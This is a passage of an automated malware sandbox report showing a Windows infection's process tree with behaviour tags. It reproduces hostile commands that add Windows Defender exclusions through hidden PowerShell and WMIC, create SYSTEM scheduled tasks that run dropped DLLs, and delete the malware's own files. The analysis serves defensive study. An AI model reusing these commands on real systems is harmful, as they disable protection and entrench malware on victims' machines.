C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:6140
-
C:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\CCtCNtF.exeC:\Windows\Temp\heXdjphsLYtTYYrU\JeJpDbzSFcJdlmk\CCtCNtF.exe ob /Pksite_idueH 525403 /S1⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5340 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bwrroZoeZRoQVpyAcj"2⤵PID:5348
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3212
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" &2⤵PID:5512
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"3⤵PID:344
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True4⤵PID:5556
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3500 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵PID:4272
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\OJLDvKxDU\gLRWYk.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "ZPVskaMeORyUtyn" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3736 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ZPVskaMeORyUtyn2" /F /xml "C:\Program Files (x86)\OJLDvKxDU\GsUQmEh.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:60 -
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "ZPVskaMeORyUtyn"2⤵PID:5528
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ZPVskaMeORyUtyn"2⤵PID:5336
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yrjCurKJXOthHv" /F /xml "C:\Program Files (x86)\jDcnSjPvYahU2\SkXhWKo.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2728 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:1856
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "NetXkRqHZJDfE2" /F /xml "C:\ProgramData\mMAjWdbxOIjSziVB\zIZhuXU.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2792 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YkvMZvjGAPbigdKuX2" /F /xml "C:\Program Files (x86)\zpJNjIVgFcEwVtLiUsR\YHsFPEI.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:4208 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nQHiQOLyvgcbJIDARWU2" /F /xml "C:\Program Files (x86)\qpZxqHvFKXpRC\WrJcxMi.xml" /RU "SYSTEM"2⤵
- Creates scheduled task(s)
PID:2600 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "EJKQCvUwFyvoZzoaf" /SC once /ST 05:44:05 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\heXdjphsLYtTYYrU\rvfTWmmv\kSYomOY.dll\",#1 /Mvsite_idYJo 525403" /V1 /F2⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:3728 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "EJKQCvUwFyvoZzoaf"2⤵PID:5544
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "qXnxKrbPbFSTFetyh"2⤵PID:4540
-
\??\c:\windows\system32\rundll32.EXEc:\windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\rvfTWmmv\kSYomOY.dll",#1 /Mvsite_idYJo 5254031⤵PID:5484
-
C:\Windows\SysWOW64\rundll32.exec:\windows\system32\rundll32.EXE "C:\Windows\Temp\heXdjphsLYtTYYrU\rvfTWmmv\kSYomOY.dll",#1 /Mvsite_idYJo 5254032⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
PID:5136 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "EJKQCvUwFyvoZzoaf"3⤵PID:5876
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1724
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5824
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4228
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3088
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5704
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6092
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1584
-
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"1⤵PID:6200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:6908
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:532
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6020
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:7052
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:3052
-
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exeC:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3172
-
C:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exeC:\Users\Admin\AppData\Local\Temp\4d0ab15804\chrosha.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1036 -
C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000147001\swiiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5288 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:4028
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:5392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 8083⤵
- Program crash
PID:7040 -
C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5668 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:3168
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6260
-
C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"4⤵
- Executes dropped EXE
PID:6840 -
C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"4⤵
- Executes dropped EXE
PID:6708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"4⤵PID:8468
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:8672
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:1492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5668 -s 5203⤵
- Program crash
PID:5512 -
C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3008 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:6972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3008 -s 5043⤵
- Program crash
PID:6512 -
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe"2⤵
- Executes dropped EXE
PID:6552 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe" /F3⤵
- Creates scheduled task(s)
PID:1600 -
C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe"2⤵
- Executes dropped EXE
PID:6896 -
C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7272 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:7344
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
- Loads dropped DLL
- Checks processor information in registry
PID:7352 -
C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe"2⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- System policy modification
PID:7476 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1000181001\file300un.exe" -Force3⤵PID:7748
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵PID:7772
-
C:\Users\Admin\Pictures\coqzjkHJEbpW9q55EOXHJsKt.exe"C:\Users\Admin\Pictures\coqzjkHJEbpW9q55EOXHJsKt.exe"4⤵
- Executes dropped EXE
PID:7548 -
C:\Users\Admin\AppData\Local\Temp\u5to.0.exe"C:\Users\Admin\AppData\Local\Temp\u5to.0.exe"5⤵
- Executes dropped EXE
PID:6648 -
C:\Users\Admin\AppData\Local\Temp\u5to.2\run.exe"C:\Users\Admin\AppData\Local\Temp\u5to.2\run.exe"5⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7332 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe6⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
PID:7736 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe7⤵PID:9004
-
C:\Users\Admin\AppData\Local\Temp\u5to.3.exe"C:\Users\Admin\AppData\Local\Temp\u5to.3.exe"5⤵
- Checks SCSI registry key(s)
PID:8564 -
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD16⤵PID:3936
-
C:\Users\Admin\Pictures\0Nhea7WWQs8EX8ArZhcVpAHV.exe"C:\Users\Admin\Pictures\0Nhea7WWQs8EX8ArZhcVpAHV.exe"4⤵
- Executes dropped EXE
PID:6264 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:7232
-
C:\Users\Admin\Pictures\0Nhea7WWQs8EX8ArZhcVpAHV.exe"C:\Users\Admin\Pictures\0Nhea7WWQs8EX8ArZhcVpAHV.exe"5⤵
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:872 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1236 -
C:\Users\Admin\Pictures\N6wB3wEBbCcQjlZT4NZcejMm.exe"C:\Users\Admin\Pictures\N6wB3wEBbCcQjlZT4NZcejMm.exe"4⤵
- Executes dropped EXE
PID:7540 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:8868
-
C:\Users\Admin\Pictures\N6wB3wEBbCcQjlZT4NZcejMm.exe"C:\Users\Admin\Pictures\N6wB3wEBbCcQjlZT4NZcejMm.exe"5⤵
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:6960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3908 -
C:\Users\Admin\Pictures\RGUyQ5HOPZjJrAUGf90W96jQ.exe"C:\Users\Admin\Pictures\RGUyQ5HOPZjJrAUGf90W96jQ.exe"4⤵
- Executes dropped EXE
PID:7692 -
C:\Users\Admin\AppData\Local\Temp\7zS1910.tmp\Install.exe.\Install.exe /RvdidblCuX "385118" /S5⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Enumerates system info in registry
PID:8160 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"6⤵PID:7224
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵PID:1020
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵PID:7932
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵PID:8140
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 10:46:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\bYrKICR.exe\" em /musite_idwaB 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:7512 -
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "bWycNackLSywaqkmgR"6⤵PID:7560
-
C:\Users\Admin\Pictures\mCUeMQ8aJkwBepz5YFcMFeyX.exe"C:\Users\Admin\Pictures\mCUeMQ8aJkwBepz5YFcMFeyX.exe"4⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4480 -
C:\Users\Admin\Documents\SimpleAdobe\fJ5WkBqEQiwDkD8cJ1vOQPvR.exeC:\Users\Admin\Documents\SimpleAdobe\fJ5WkBqEQiwDkD8cJ1vOQPvR.exe5⤵PID:7060
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:6648
-
C:\Users\Admin\Documents\SimpleAdobe\fJ5WkBqEQiwDkD8cJ1vOQPvR.exe"C:\Users\Admin\Documents\SimpleAdobe\fJ5WkBqEQiwDkD8cJ1vOQPvR.exe"6⤵PID:868
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile7⤵PID:5204
-
C:\Users\Admin\Documents\SimpleAdobe\Th1PUhyarSTHgHGJTc10cwE0.exeC:\Users\Admin\Documents\SimpleAdobe\Th1PUhyarSTHgHGJTc10cwE0.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
PID:7952 -
C:\Users\Admin\Documents\SimpleAdobe\5zC3uXWQSqA9lqrP98QhNr30.exeC:\Users\Admin\Documents\SimpleAdobe\5zC3uXWQSqA9lqrP98QhNr30.exe5⤵PID:1956
-
C:\Users\Admin\Documents\SimpleAdobe\vdDEwEeI8H95W3MmTtoxoRMB.exeC:\Users\Admin\Documents\SimpleAdobe\vdDEwEeI8H95W3MmTtoxoRMB.exe5⤵PID:7096
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2401.bat" "6⤵PID:5604
-
C:\Users\Admin\Documents\SimpleAdobe\ViguuPh70nLWOB2dMfZfvUMH.exeC:\Users\Admin\Documents\SimpleAdobe\ViguuPh70nLWOB2dMfZfvUMH.exe5⤵PID:4132
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe6⤵PID:8464
-
C:\Users\Admin\Documents\SimpleAdobe\rBdWuA6zmGPcTnlvCUeUt5hz.exeC:\Users\Admin\Documents\SimpleAdobe\rBdWuA6zmGPcTnlvCUeUt5hz.exe5⤵PID:7020
-
C:\Users\Admin\AppData\Local\Temp\is-52AB0.tmp\rBdWuA6zmGPcTnlvCUeUt5hz.tmp"C:\Users\Admin\AppData\Local\Temp\is-52AB0.tmp\rBdWuA6zmGPcTnlvCUeUt5hz.tmp" /SL5="$14007E,4487376,53248,C:\Users\Admin\Documents\SimpleAdobe\rBdWuA6zmGPcTnlvCUeUt5hz.exe"6⤵
- Loads dropped DLL
PID:7092 -
C:\Users\Admin\Documents\SimpleAdobe\x8czyfkmmCzRCnptPtoRIMT4.exeC:\Users\Admin\Documents\SimpleAdobe\x8czyfkmmCzRCnptPtoRIMT4.exe5⤵
- Suspicious use of SetThreadContext
PID:5308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:5004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 5046⤵
- Program crash
PID:1720 -
C:\Users\Admin\Documents\SimpleAdobe\cNfT86s447KaBzQurj9awdEl.exeC:\Users\Admin\Documents\SimpleAdobe\cNfT86s447KaBzQurj9awdEl.exe5⤵
- Suspicious use of SetThreadContext
PID:6508 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵PID:7456
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7456 -s 19327⤵
- Program crash
PID:8092 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6508 -s 5086⤵
- Program crash
PID:6380 -
C:\Users\Admin\Documents\SimpleAdobe\B96dzdI5a3rTJ0MbwR8vdyO5.exeC:\Users\Admin\Documents\SimpleAdobe\B96dzdI5a3rTJ0MbwR8vdyO5.exe5⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:8180 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"6⤵PID:4188
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ffa43389758,0x7ffa43389768,0x7ffa433897787⤵PID:5372
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1524 --field-trial-handle=2164,i,10199824530111168666,18406515827760743927,131072 /prefetch:27⤵PID:7312
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1752 --field-trial-handle=2164,i,10199824530111168666,18406515827760743927,131072 /prefetch:87⤵PID:9148
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1836 --field-trial-handle=2164,i,10199824530111168666,18406515827760743927,131072 /prefetch:87⤵PID:6912
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3008 --field-trial-handle=2164,i,10199824530111168666,18406515827760743927,131072 /prefetch:17⤵PID:6104
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3028 --field-trial-handle=2164,i,10199824530111168666,18406515827760743927,131072 /prefetch:17⤵PID:6200
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3468 --field-trial-handle=2164,i,10199824530111168666,18406515827760743927,131072 /prefetch:17⤵PID:2040
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3556 --field-trial-handle=2164,i,10199824530111168666,18406515827760743927,131072 /prefetch:17⤵PID:8164
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4268 --field-trial-handle=2164,i,10199824530111168666,18406515827760743927,131072 /prefetch:17⤵PID:9056
-
C:\Users\Admin\Documents\SimpleAdobe\wXm4Bs9wEGJzYuAnBTWOo4o6.exeC:\Users\Admin\Documents\SimpleAdobe\wXm4Bs9wEGJzYuAnBTWOo4o6.exe5⤵PID:8148
-
